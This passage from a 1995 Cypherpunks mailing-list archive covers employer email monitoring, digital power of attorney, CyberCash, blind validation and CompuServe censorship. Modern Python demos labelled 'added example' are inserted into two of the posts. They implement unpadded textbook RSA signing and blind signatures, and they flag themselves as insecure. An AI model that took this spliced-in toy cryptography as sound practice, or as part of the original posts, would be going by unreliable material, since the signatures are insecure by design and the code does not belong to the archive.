Communications Privacy Act--I think).  I don't have URLs handy, but it
should be easy enough to find via Alta Vista or Yahoo.

The way I understand it, though there are fairly strict limits on the
snooping your employer can do, you waive more or less all your privacy
rights if you sign a form saying you "consent" to the snooping.  Your
encryption question falls in kind of a grey area (most of the ECPA
deals with reading people's email, etc.), but it's probably covered in
there somewhere.

I have very strong feelings about this subject, but I'll keep them to
myself for now since I'm posting from work.  We were all informed a
week or two ago that Bear Stearns is now archiving every piece of
email coming into or leaving the company.

All I'll say here is that I disagree strongly with the views Tim May
posted about employees' property rights, etc. (though we agree on most
other things).

   --Dave.



--
*******************************************************************************
Bear Stearns is not responsible for any recommendation, solicitation, offer or
agreement or any information about any transaction, customer account or account
activity contained in this communication.
*******************************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mark@ausnetinfo.com.au (Mark)
Date: Thu, 28 Dec 1995 20:48:00 +0800
To: master@internexus.net (Laszlo Vecsey)
Subject: Re: Encrypted script - sort of
In-Reply-To: <Pine.LNX.3.91.951222230842.16815A-100000@micro.internexus.net>
Message-ID: <199512272234.JAA05530@ausnetinfo.com.au>
MIME-Version: 1.0
Content-Type: text


>> >A tale I hear is that when HP had to deliver operating system source to
>> >the french government they stripped all comments and changed all variable
>> >and subroutine names to 32 byte strings of I 1 0 (zero) and O (uppercase O).
>> >It still compiled but was 100% useless to human readers.
>
>A somewhat useful utility would be one that would compress C code into as 
>small space as possible, stripping out all spaces and making variable 
>names one character a piece when possible. And of course one to expand it 
>back into 'formatted' text, style could even be incorporated.
>
>I'm sure a Perl fanatic knows a quick solution... I'm always amazed at 
>how short Perl code is.. :)   Anyone care to take care of this utility?

press.c has been circulating for several years. I don't know of an unpress.c
but a beautifier would do the same thing.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Mandl <dmandl@bear.com>
Date: Fri, 29 Dec 1995 03:43:37 +0800
To: "Jason D. Livingood/WSC"@hks.net, cypherpunks@toad.com
Subject: Re: Employer Probing Precedents?
In-Reply-To: <Pine.SUN.3.91.951228091552.4338d-100000@goya>
Message-ID: <Pine.SUN.3.91.951228093514.4338g-100000@goya>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 28 Dec 1995, I wrote:

> All I'll say here is that I disagree strongly with the views Tim May
> posted about employees' property rights, etc. (though we agree on most
> other things).

Um, I meant employers' rights, obviously.

   --Dave.

--
*******************************************************************************
Bear Stearns is not responsible for any recommendation, solicitation, offer or
agreement or any information about any transaction, customer account or account
activity contained in this communication.
*******************************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 29 Dec 1995 05:55:57 +0800
To: "David E. Smith" <dsmith@midwest.net>
Subject: Re: Proxy/Representation?
In-Reply-To: <199512281517.JAA13397@cdale1.midwest.net>
Message-ID: <199512281546.KAA09482@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"David E. Smith" writes:
> The question is: how do the current software packages handle representatives
> and proxies for a given is-a-person?  Using PGP as an example, I can't sign
> a message with Helen's key.

Nor should you be able to, actually.

When you sign a document on behalf of another and have "Power of
Attorney" in the paper world, you sign your own name and indicate that
you are signing on behalf of another, as in "David Smith for Helen
Smith".

The right way to do this in the digital world, IMHO, is to have a
standard for "Power of Attorney" documents, and for the entity
receiving something signed in your key that should be signed in
another person's key to also see the digitally signed power of
attorney document. Then the entity can check the signature on the
power of attorney was in Helen's key, and that the signed key in that
document was the key that signed the document signed by the "attorney".

> I'm sure that this has already popped up, so I'll just ask for pointers.

Actually, I haven't seen it mentioned before -- it's only a subset of
other problems, though, like transient keys signed by longer term
keys. There should be some standardization in formats to handle this.

Perry
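
Added example, not part of Perry Metzger's message or of any package named on the list: a verifier for the two-signature check he describes, in which the recipient confirms that the power of attorney is signed in the principal's key and that the key it names is the key that signed the message. The textbook RSA over fixed Mersenne primes, the JSON layout, the key fingerprint and the "scope" field are all assumptions made for illustration; the toy signature is not secure and stands in for a real signature scheme.

```python
import hashlib
import json

E = 65537  # public exponent shared by all toy keys (assumption)


def make_key(p, q):
    """Textbook RSA key from two primes. Toy only: no padding, small modulus."""
    return {"n": p * q, "d": pow(E, -1, (p - 1) * (q - 1))}


def fingerprint(n):
    """Short identifier for a public modulus; used to name a key in the grant."""
    return hashlib.sha256(str(n).encode()).hexdigest()[:16]


def digest(data, n):
    """SHA-256 of the data, reduced into the range of the modulus."""
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % n


def sign(key, data):
    return pow(digest(data, key["n"]), key["d"], key["n"])


def verify(n, data, sig):
    return pow(sig, E, n) == digest(data, n)


def make_poa(principal_key, principal, attorney, attorney_n, scope):
    """Principal signs a statement naming the attorney's key and the scope."""
    doc = json.dumps({"principal": principal,
                      "attorney": attorney,
                      "attorney_key": fingerprint(attorney_n),
                      "scope": sorted(scope)}, sort_keys=True).encode()
    return doc, sign(principal_key, doc)


def check_on_behalf(principal_n, attorney_n, poa, poa_sig, msg, msg_sig, purpose):
    """Return "ok", or the reason the delegated signature is rejected."""
    # 1. Authenticate the grant before parsing or trusting any field in it.
    if not verify(principal_n, poa, poa_sig):
        return "power of attorney not signed by principal"
    grant = json.loads(poa)
    # 2. The key presented by the signer must be the key the principal named.
    if grant["attorney_key"] != fingerprint(attorney_n):
        return "signing key is not the key named in the power of attorney"
    # 3. Hypothetical scope check: the grant covers only listed purposes.
    if purpose not in grant["scope"]:
        return "purpose outside delegated scope"
    # 4. Only now check the attorney's signature on the message itself.
    if not verify(attorney_n, msg, msg_sig):
        return "message not signed by attorney key"
    return "ok"


# Constructed sample keys and documents (Mersenne primes, chosen for brevity).
HELEN = make_key(2**127 - 1, 2**89 - 1)
DAVE = make_key(2**107 - 1, 2**61 - 1)
OTHER = make_key(2**521 - 1, 2**607 - 1)   # a key Helen never delegated to

POA, POA_SIG = make_poa(HELEN, "Helen", "Dave", DAVE["n"], ["groceries"])
MSG = b"Pay the grocer for this order. Signed: David Smith for Helen Smith"
MSG_SIG = sign(DAVE, MSG)

if __name__ == "__main__":
    print(check_on_behalf(HELEN["n"], DAVE["n"], POA, POA_SIG,
                          MSG, MSG_SIG, "groceries"))
```

The order of the checks matters: no field of the grant is read until the principal's signature on it has verified.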




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 29 Dec 1995 06:45:02 +0800
To: norm@netcom.com (Norman Hardy)
Subject: Re: URL for cypherpunks
In-Reply-To: <ad07a8b7010210043d01@DialupEudora>
Message-ID: <199512281556.KAA05580@homeport.org>
MIME-Version: 1.0
Content-Type: text


Norman Hardy wrote:

| I am putting up some solutions to the Garage Door problem that was
| discussed here perhaps a year ago. I would like to refer to the cypherpunks
| by URL. Are there currently any appropriate URLs ?

	Possibly the archive site at www.hks.net.  Tim May's
Cyphernomicon.  

	mailto:cypherpunks@toad.com is NOT an appropriate pointer.
People who hand out pointers to mailing lists (other than the
subscribe address) are annoying fools, and encourage many innocent
fools to annoy many people.

	The csua.cs.bezerkely site is good, but hasn't been maintained
in a while.  (Unfortunately, there is enough cypherpunk & related
stuff out there that maintaining a really good site would be a full
time job.  That's not a flame at any of the people out there who do good
work, just a wish for a really well organized www.cypherpunks.org
library & pointer list, should someone decide to pay for it. :)

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 29 Dec 1995 07:13:58 +0800
To: dee@cybercash.com (Donald E. Eastlake 3rd)
Subject: Re: Cybercash security
In-Reply-To: <Pine.SUN.3.91.951228090339.23964B-100000@cybercash.com>
Message-ID: <199512281557.KAA05598@homeport.org>
MIME-Version: 1.0
Content-Type: text


Donald E. Eastlake 3rd wrote:

| The current plans include a way to link your CyberCash persona with
| a bank account (DDA).  If you have done that and there is cash in
| your CyberCash persona, you would be able to transfer it to the bank
| account.  Using ACH, this operation typically happens overnight.

	Wow.  Overnight clearing, bank interaction to load an account,
*and* identity linking!  Tell me again why this is better than FV?

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 29 Dec 1995 10:22:32 +0800
To: cypherpunks@toad.com
Subject: Laws, Politics, and Crypto Anarchy
Message-ID: <ad08136b06021004610e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


(Those interested in discussions of Fermat numbers should skip this message.)


At 2:33 PM 12/28/95, David Mandl wrote:

>I have very strong feelings about this subject, but I'll keep them to
>myself for now since I'm posting from work.  We were all informed a
>week or two ago that Bear Stearns is now archiving every piece of
>email coming into or leaving the company.
>
>All I'll say here is that I disagree strongly with the views Tim May
>posted about employees' property rights, etc. (though we agree on most
>other things).

Yes, Dave and I agree about many things, but disagree about some things. I
would not like to have my e-mail into and out of Bear Stearns--were I an
employee--archived, monitored, and so forth, but I can certainly see why
they feel the need to do it (their liability for SEC violations, insider
trading, etc. is enormous). And were I an employer, I would not want some
government telling me I am forbidden to see if my employees are selling me
out over the Net. Just an example.

(Important Historical Note: The thing that got me interested in
cryptography, beyond my longstanding interest in the elegant mathematics of
public key cryptography, was an evaluation I did in 1987 of an "information
trading" business startup. My friend Phil Salin asked me to review his
business plan for a company which later became "American Information
Exchange" (AMIX). It allowed for people with information to sell to reach
the potential buyers, and for buyers to reach potential sellers. Like a
classified ad system. I thought about the system and said: "As an employer,
I could not let my employees use your system." Phil's reaction was "Huh?"
So I outlined a scheme whereby employees could begin "digital
moonlighting," not only selling their expertise to my competitors on
_company time_, but, infinitely worse, selling specific trade secrets to my
competitors! I cited to Phil the prospect of a "BlackNet" (yes, I named it
that in '87) which bought and sold corporate (and military, as I elaborated
on the concept) secrets through digital pseudonyms and Chaum-style mixes.
It became apparent to me what the Brave New World was going to look like.
And thus were the ur-cypherpunkish ideas born.)

It was not my intention to begin a debate about the nature of civil
liberties and the role of property. In fact, I don't think "libertarian"
debates are very useful here, for various reasons. (Though I don't go as
far as some in thinking that only pure crypto should be discussed....the
mix of crypto, programming, personal privacy, and technological empowerment
is what we talk about.)

Moreover, if political and economic issues never get discussed at all, some
folks may think that Cypherpunks are "obviously" supportive of things like
Data Protection Laws (which place limits on the compilation of dossiers and
files on people), Electronic Privacy Laws (which tell employers they cannot
snoop on employees), and Web Index Laws (which may limit the archiving and
indexing of Usenet and Web items).

In fact, I am against all of these laws.

However, I won't take the list's time now to explain why, as the political
discussion would take too long. Past articles have touched on these points,
and references are scattered throughout the Cyphernomicon.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald E. Eastlake 3rd" <dee@cybercash.com>
Date: Fri, 29 Dec 1995 08:44:05 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Cybercash security
In-Reply-To: <199512281557.KAA05598@homeport.org>
Message-ID: <Pine.SUN.3.91.951228113432.24703G-100000@cybercash.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 28 Dec 1995, Adam Shostack wrote:

> Donald E. Eastlake 3rd wrote:
>
> [in answer to a question about how you would unload cash from a
>  Cybercash persona]
>
> | The current plans include a way to link your CyberCash persona with
> | a bank account (DDA).  If you have done that and there is cash in
> | your CyberCash persona, you would be able to transfer it to the bank
> | account.  Using ACH, this operation typically happens overnight.
> 
> 	Wow.  Overnight clearing, bank interaction to load an account,
> *and* identity linking!  Tell me again why this is better than FV?

Your comment is sufficiently short and cryptic that it's a bit hard to
tell what your point is.  Different services are good for different
things.  Most of the merchants signed up with CyberCash currently
sell hard goods that they physically ship to you.  They have different
needs from the on-line information vendors that FV primarily serves
at this time.

But both CyberCash and, I understand, FV plan to expand their service
repertoire. 

If you want to use your credit card or bank account via CyberCash, you
need to go through an authentication step to link them.  If you don't
want to use a credit card or bank account, there is no requirement
to provide any real identity information when you set up a CyberCash
persona.

> Adam
> 
> -- 
> "It is seldom that liberty of any kind is lost all at once."
> 					               -Hume

Donald
=====================================================================
Donald E. Eastlake 3rd     +1 508-287-4877(tel)     dee@cybercash.com
   318 Acton Street        +1 508-371-7148(fax)     dee@world.std.com
Carlisle, MA 01741 USA     +1 703-620-4200(main office, Reston, VA)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@utopia.hacktic.nl>
Date: Thu, 28 Dec 1995 23:40:30 +0800
To: cypherpunks@toad.com
Subject: Re: Announcing a new alpha release of premail
Message-ID: <199512281108.MAA08509@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


You sez:
:    This is to announce that premail version 0.42 is now available. It
: is a full alpha version of the new premail, containing all the
: features and functions planned for the production release.

[..]
:    If you are in the US or Canada, you can download premail now, from
: the premail Distribution Authorization Form:

:       http://kiwi.cs.berkeley.edu/premail-form.html

: Raph Levien


ftp://ftp.hacktic.nl/pub/replay/pub/incoming




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Fri, 29 Dec 1995 09:07:11 +0800
To: cypherpunks@toad.com
Subject: Re: URL for cypherpunks
In-Reply-To: <ad07a8b7010210043d01@DialupEudora>
Message-ID: <Pine.LNX.3.91.951228124406.262A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 27 Dec 1995, Norman Hardy wrote:

> I am putting up some solutions to the Garage Door problem that was
> discussed here perhaps a year ago. I would like to refer to the cypherpunks
> by URL. Are there currently any appropriate URLs ?

The most appropriate URL would be http://www.csua.berkeley.edu/cypherpunks/.



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMOLX0LZc+sv5siulAQH/pgP/bDZ1cy0YjaQeuusUwoAkikJhdKtjW8r5
eoJzRcGaaPd1wdOuVP3w4ab5D2+LMj/B765GumHV9okT/01yHVcratqVymDxkG05
TuE7RSpicusKfa/V0cpb6uZjqjbP8DPj9nEX5CU3YFMHzmFCGlRNjsYj6n4odpqW
XBQF/i1AHoU=
=UEJR
-----END PGP SIGNATURE-----


finger -l markm@omni.voicenet.com for PGP key  Key-ID: 0xF9B22BA5
Fingerprint: bd24d08e3cbb53472054fa56002258d5  http://www.voicenet.com/~markm/
-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GAT d- s:- a? C++++ U+++>$ P+++ L++(+++) E--- W++(--) N+++ o- K
w--- O- M- V-- PS+++>$ PE-(++) Y++ PGP+(++) t-@ 5? X++ R-- tv+
b+++ DI+ D++ G+++ e! h* r! y?
------END GEEK CODE BLOCK------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <alex@proust.suba.com>
Date: Fri, 29 Dec 1995 13:00:08 +0800
To: cypherpunks@toad.com
Subject: blind validation
Message-ID: <199512281849.MAA08259@proust.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


With all the recent Congressional activity, I've been thinking
about blind validation.  I know that other people (Chaum, for
one) have considered it, but it's not something that's talked
about online very often.  I'd like to kick off a discussion. 

I'm not good with protocols, there are almost certainly some
flaws in my thinking, and I'm not familiar with much of what
others have written on the subject.  Any pointers or constructive
criticism will be greatly appreciated.


I    Basics

(Almost everyone here will be familiar with this stuff;  I'm
including it for completeness.)

By "blind validation", I mean allowing someone to prove that
they're entitled to do something without making them tell you who
they are.

One obvious application of blind validation is to allow people to
download adult material anonymously while making sure that
children don't have access.  Other applications might be allowing
US citizens to download crypto software anonymously, or giving
members of a University community anonymous access to computing
resources that aren't available to the general public.

Why is blind validation desirable?  Without blind validation,
it's possible to build large and intrusive databases by linking
together the various fields on your ID cards, especially your
social security number.

When someone goes to a liquor store and shows an ID, he doesn't
just prove he's over 21.  He tells the clerk his name and
address, and whether or not he wears glasses, among other things.

This isn't a big problem when you're showing your ID to a clerk,
because the clerk is a human being who won't remember your name
or address.  But a computer has a very good memory, and groups of
computers are very good at assembling data from disparate
sources.  There are already online services that do this.  

Westdata, for example, offers a service that allows customers to
search a database assembled from a variety of sources -- census
information, real estate transactions, credit information,
telephone directories, and the like.  It's pretty easy to go
online and find someone's SSN, and once you've got that it's
possible to retrieve all sorts of information.

This is why it's sensible for us to give out as little
information as is necessary to accomplish whatever it is we're
trying to do.  That's what blind validation is all about.



II   Transferability -- blind validation's big problem.

Suppose Alice is allowed to do something.  How can we prevent her
from giving Carol the right to do it as well?

We can't.  This is true of any (ok, I don't know that -- most)
validation scheme, not just blind schemes.  I can give away a
unix account's login name and password, or even my PGP key.  

But conventional validation schemes have a big advantage over
blind ones:  in non-blind validation, users can be held
accountable for the people they let in.  If I give someone access
to my unix account and they post photoshop disk images to usenet,
I'll be held responsible.  I have a strong incentive to keep my
password secret.

If I can get blind validation to do something, I can't be held
accountable for my own actions, or for giving access to someone
else.  This fact drastically reduces the number of situations in
which blind validation is useful.

Here's a simple blind validation protocol that won't work:

1.   Alice generates a random number, blinds it, and sends it to
     Trent along with proof that she's validateable.

2.   Trent checks Alice's proof of validatability, signs her
     blinded number, then returns it to her.

3.   Alice unblinds her number and sends it to Bob, along with a
     request for a download.

Then Alice uses a remailer to post her number to usenet, along
with Trent's signature, and Bob has to let everyone who reads net
news download files.

Even a ticket based protocol similar to ecash won't work.  Let's
assume that Bob wants a ticket in exchange for a file, and that
he checks the tickets people give him for double spending. 
What's to stop Alice from getting a thousand tickets from Trent
and giving them to her friends?  Tickets aren't ecash -- they
don't cost anything.  Trent will give a ticket to anyone who can
prove he's validatable, and there's nothing preventing Alice from
going back for tickets over and over again.


III  Kids and Liquor Stores

Imagine a group of teenagers who want to buy some booze.  Let's
consider two attacks they can mount on a liquor store:  they can
go in and try to trick the clerk into selling to them, or they
can hang around in the parking lot and try to convince an adult
to buy for them.

The liquor store wants to keep its license, so it tries hard to
defend against the first attack.  But there's nothing they can do
about the second attack, and what's more, they really don't have
to worry about it.  If they give booze to minors, they can lose
their license or possibly even face criminal charges.  But if
some other adult gives booze to the minors, he's responsible. 
It's not the liquor store's problem.

If the kids get their booze from the clerk or another customer,
the end result is the same:  the kids are able to get drunk.  But
from the store's point of view, there's a big difference, the
difference between losing their license and keeping it.

This is very different from the attitudes of the participants in
most crypto protocols.  If I use a protocol to exchange secure
email, I don't want anyone except the recipient to read it.  It's
not much comfort for me to be able to say, "It's not my fault,"
if the mail becomes public.

But the liquor store has to be able to live with the possibility
that a kid will get ahold of some booze from their shelves.  If
that's absolutely unacceptable to them, the only thing they can
do is close their doors or make patrons drink up in front of the
clerk, because they can't prevent a customer from giving a bottle
to a minor.  The main interest of the liquor store is to avoid
blame for underage drinking, not to make absolutely sure that
kids can't drink.



IV   Alice, Bob, and Sam.

Let's assume that Bob is running an FTP archive with crypto
software, and Alice wants to download it.  Alice wants to remain
anonymous.  Let's assume that a blind validation scheme, where
Alice proves that she's a US citizen while remaining anonymous,
is acceptable to both of them.

If a blind validation scheme is acceptable, why isn't no
validation at all?  Obviously Alice ought to be satisfied with no
validation.  She wants the file, and she wants to remain
anonymous.  If Bob doesn't use any validation, Alice is still
happy.

But what about Bob?  Bob's not an idiot.  He knows that if he
distributes crypto software on the net, someone's going to send a
copy to Europe, and if he uses blind validation he won't be able
to find out who did it.  Consequently, if the software's
appearance in Europe is totally unacceptable to Bob, he won't
distribute it with blind validation.

If Bob can live with the software appearing in Europe, why does
he want to use blind validation to check for citizenship?  The
answer, obviously, is that Sam (as in Uncle, the government) has
told Bob he'll be imprisoned if he exports the software.  The
blind validation scheme will let Bob distribute the software
anonymously (which is what he wants to do) and prove to Sam that
he's followed the letter of the law.

In general, it doesn't seem that there are many situations that
only involve Alice and Bob where blind validation makes sense.
If Bob is willing to accept the increased risk of transferability
that comes with blind validation, he'll probably be willing to
accept no validation at all.  Blind validation becomes useful
primarily when you add Sam to the mix.

This isn't an absolute truism of course.

Let's think about a library card catalog at a University.

I remember a conversation I once had with an INS investigator, in
which he told me that he sometimes asked for a list of all the
books his targets had taken from the public library.  You can
learn a lot about someone from what they read, or even from their
card catalog searches.

I know that some universities restrict access to their card
catalogs to students, faculty, and staff.  Why?  Because they
don't want to shoulder the cost of providing a research tool to
the entire net.  They're not trying to protect the information --
they're trying to reduce load on their library computer.

Perhaps a University might recognize that there's some
value in using a blind authentication system to grant access to
the catalog.  It could protect the privacy of the people using
the catalog, and still do a reasonably good job of keeping out
people who shouldn't be involved.

The role of Sam in this discussion might be one of the reasons
that blind validations haven't generated much interest on the net
in general or on the cypherpunk list specifically.  If blind
validation is primarily useful for cooperating with laws we don't
agree with, then it's not unreasonable to look at it as a
technology of collaboration.  A viable blind validation scheme
might make censorship more attractive.


V    A protocol

Let's assume that Alice knows that Bob and Trent are who they
claim to be, and that she can talk to Bob anonymously, perhaps
through a chain of remailers or a dc net.  This protocol isn't
intended to protect Bob's privacy, only Alice's.

We also assume that there's some sort of system in place for non-
blind validations.

1.   Alice initiates a transaction with Bob.  (Perhaps by asking
     him for a file.)

2.   Bob generates a random number and sends it back to Alice.

3.   Alice blinds Bob's number and sends it to Trent, along with
     proof of her validatability.

4.   Trent checks Alice's proof, signs the blinded number, and
     then returns it to Alice.

5.   Alice unblinds Bob's number, then sends it to Bob.

6.   Bob checks Trent's signature and makes sure that the number
     he received matches the one he sent out.  Then Bob processes
     Alice's transaction.

If Bob always follows this protocol, he can prove to Sam that
he's followed the law.  Alice remains anonymous.  Alice can still
transfer the file, but she has to give it away herself:  she
can't give away the ability to get it directly from Bob without
giving away the ability to prove Aliceness to Trent.  This means
that she'd have to accept all the consequences of giving away
non-blind validatability.

The main problems that I can see with this protocol are:

1.   It's vulnerable to traffic analysis.
2.   Sam has to trust Trent, which he may be unwilling to do.
3.   You can infer stuff about Alice from the kinds of requests
     she makes of Trent.  Someone who always asks Trent for proof
     that he's not a felon might tag himself as a person who buys
     a lot of guns or ammunition, for example.

I'd like to put Trent out of a job, but it's hard to imagine a
Trentless system without Chaum's observer chips.  I've read Hal's
criticisms of observer chips, and what he says makes sense to me.

But observer chips could be more appropriate in a blind
validation situation than they are with ecash.  Ecash security
has to be bullet proof, but if we can live with transferability
in a blind validation system we've already given up on such
rigorous security.
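
An added illustration of the Section V exchange above, not part of the original post: a toy RSA blind signature in which Trent signs Bob's number without seeing it and Bob accepts each number once. The post names no signature scheme, so the RSA construction, the hashing step, the demo key and every class and function name here are assumptions.

```python
"""Toy model of the Section V exchange: Trent blind-signs Bob's nonce for Alice."""
import hashlib
import secrets
from math import gcd

# Constructed demo key for Trent: textbook RSA over two Mersenne primes.
# Far too weak and structured for real use; it only keeps the example offline.
P, Q, E = 2**107 - 1, 2**127 - 1, 65537
N = P * Q
D = pow(E, -1, (P - 1) * (Q - 1))        # Trent's private exponent


def h(number: bytes) -> int:
    """Hash a number into Z_N before signing (assumption: the post names no scheme)."""
    return int.from_bytes(hashlib.sha256(number).digest(), "big") % N


class Trent:
    """Validator: checks entitlement non-blindly, signs values he cannot read."""

    def __init__(self, entitled):
        self.entitled = set(entitled)
        self.seen = []                    # (identity, blinded value) pairs Trent observes

    def sign_blinded(self, identity: str, blinded: int) -> int:
        if identity not in self.entitled:          # step 4: check Alice's proof
            raise PermissionError(identity)
        self.seen.append((identity, blinded))
        return pow(blinded, D, N)


class Bob:
    """Server: one fresh random number per transaction, accepted at most once."""

    def __init__(self):
        self.outstanding = set()

    def challenge(self) -> bytes:                  # step 2
        nonce = secrets.token_bytes(16)
        self.outstanding.add(nonce)
        return nonce

    def redeem(self, nonce: bytes, sig: int) -> bool:   # step 6
        if nonce not in self.outstanding:          # never issued, or already used
            return False
        if pow(sig, E, N) != h(nonce):             # not Trent's signature on it
            return False
        self.outstanding.discard(nonce)
        return True


def get_signature(identity: str, number: bytes, trent: Trent) -> int:
    """Steps 3-5: blind the number, have Trent sign it, unblind the result."""
    while True:
        r = secrets.randbelow(N - 2) + 2           # blinding factor, 2 <= r < N
        if gcd(r, N) == 1:
            break
    blinded = (h(number) * pow(r, E, N)) % N       # Trent sees only this
    signed = trent.sign_blinded(identity, blinded)  # = h(number)^D * r mod N
    return (signed * pow(r, -1, N)) % N            # = h(number)^D mod N


def run_demo() -> dict:
    trent, bob = Trent({"alice"}), Bob()

    nonce = bob.challenge()
    sig = get_signature("alice", nonce, trent)
    first_use = bob.redeem(nonce, sig)
    replay = bob.redeem(nonce, sig)                # same pair presented again

    other_nonce = bob.challenge()                  # a different transaction
    wrong_nonce = bob.redeem(other_nonce, sig)     # old signature, new nonce

    own_number = secrets.token_bytes(16)           # Section II style: Alice picks it
    own_sig = get_signature("alice", own_number, trent)
    self_chosen = bob.redeem(own_number, own_sig)  # valid signature, not Bob's number

    try:
        get_signature("carol", other_nonce, trent)
        carol_refused = False
    except PermissionError:
        carol_refused = True

    return {
        "first_use": first_use,
        "replay": replay,
        "wrong_nonce": wrong_nonce,
        "self_chosen": self_chosen,
        "carol_refused": carol_refused,
        "trent_saw_plain": any(b == h(nonce) for _, b in trent.seen),
    }


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name}: {value}")
```

Only the first redemption succeeds; the `trent_saw_plain` result shows that Trent's record of Alice never contains the value Bob later checks.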





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Corey Bridges <corey@netscape.com>
Date: Fri, 29 Dec 1995 14:03:55 +0800
To: "Vladimir Z. Nuri" <cypherpunks@toad.com
Subject: Re: cool cpunk project proposal: "cpunk approved" logo
Message-ID: <199512282150.NAA10375@urchin.netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


>now, I don't know if people here realize how much great potential this
>idea has. the media just LOVES to quote these kinds of judgements when
>it's a slow news day (witness Blackwell's "worst dressed" list or
>"best haircuts" or whatever else).

Well...nothing personal, but I'd rather cut my n*ts off than be the
blackwell of the information industry... >:-)

And not to poo-poo a nifty idea, but ultimately, I think that any c'punk
cooperative effort like that is doomed to failure. Sure, people can manage
to get together every month or so for a cypherpunk meeting (well, *I* can't,
but I'm even more disorganized than most), but beyond that, things like
official c'punk press releases, and official c'punk FAQs, and official
c'punk seals of approval are just NOT going to happen and still be called
Officially Cypherpunk. It's tough to have an "official" anything for a group
that's not REALLY a group--just the name of a mailing list. 

Now, this doesn't stop Tim from creating his Cyphernomicon, and it doesn't
stop other people on this list from issuing their own press releases. Nor
should it stop you (and other interested parties) from issuing your seal of
approval to worthy products. I just don't think it'll work to call it the
Official Cypherpunk S-O-A.

Besides, the idea of having an official seal-of-approval sticker sounds like
we're only one step away from having Cypherpunk action figures. ("New Eric
Hughes figure with crushing logic grip! Detweiler with whirling Tentacles of
Doom (tm)!")

Uh, I guess I should have put "NOISE" in the subject line...


Corey Bridges
Security Documentation
Netscape Communications Corporation
home.netscape.com/people/corey
415-528-2978





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 29 Dec 1995 12:59:15 +0800
To: cypherpunks@toad.com
Subject: Compuserve is Not "Censoring": Look to Governments for the Cause
Message-ID: <ad083eea080210049a53@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:52 PM 12/28/95, Cees de Groot wrote, speaking of Compuserve's recent
dropping of many newsgroups in response to demands by German prosecutors:

>I won't start to comment on the style of this message. The term "Suitspeak"
>comes to mind.

Perhaps it is "Suitspeak," but it is not "censorship."

Or, more precisely, it is fear that government laws will be used to
sanction the service.  Thus, it is the government of Germany in this case
which is "censoring." ("Censor" and "censorship" are notoriously overloaded
terms, of course.)

Likewise, the Telecom/Exon Bill which we are so opposed to would just make
the U.S. another player in this arena, joining Germany, Iraq, Syria,
Singapore, and other regimes in attempting to regulate what people access
on the Net. The U.S. would most likely demand that a foreign-based service
operating in the U.S. comply with U.S. laws. The problem lies with the laws
themselves, as there is essentially no solution which will accommodate all
of the various conflicting standards and mores of the world's nations and
tribes while still having a Net such as we know it today. This is why I
favor "technological anarchy": have systems which allow people to read and
write what they want to read and write, not what church elders or
government officials have deemed to be appropriate or wholesome.

(Note: There are ongoing debates about whether laws against obscenity,
pornography, insulting speech, and on and on, violate free speech
provisions in the U.S. Constitution. I won't get into this here. However,
the laws of Germany, Iraq, North Korea, Singapore, France, Syria,......,
Germany, Japan, Italy, and Zaire are definitely not those of the U.S. Thus,
any _global_ service, such as Compuserve, may soon be forced to remove 70%
or more of all Usenet newsgroups, and to restrict Web page access. After
all, providing access to "alt.binaries.pictures.muslim.women.nude" is
punishable by death by stoning in at least 30 countries. And providing
access to Christian recruiting groups, and most Jewish groups, is
definitely not allowed in the Kingdom of Saudi Arabia--better remove all
those groups.)

More than just Compuserve and AOL--which has a list of words it does not
like to see used--I expect the various attempts to crack down on
un-Christian, un-Muslim, un-chastity, etc. words and images to spread.
Singapore will have its list of things it doesn't want its "children" (=
all citizen-units) to see, Nigeria will have its list, and so on.

Germany's longstanding moves to limit images and words it considers
inappropriate and offensive are likely to force many Usenet newsgroups out
of Germany. Law enforcement there is concentrating on Compuserve, and is
trying to get U.S. officials to crack down on neo-Nazi Web sites in the
U.S.

The shape of things to come.

Technology to bypass these new laws, not even more laws, is the key.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
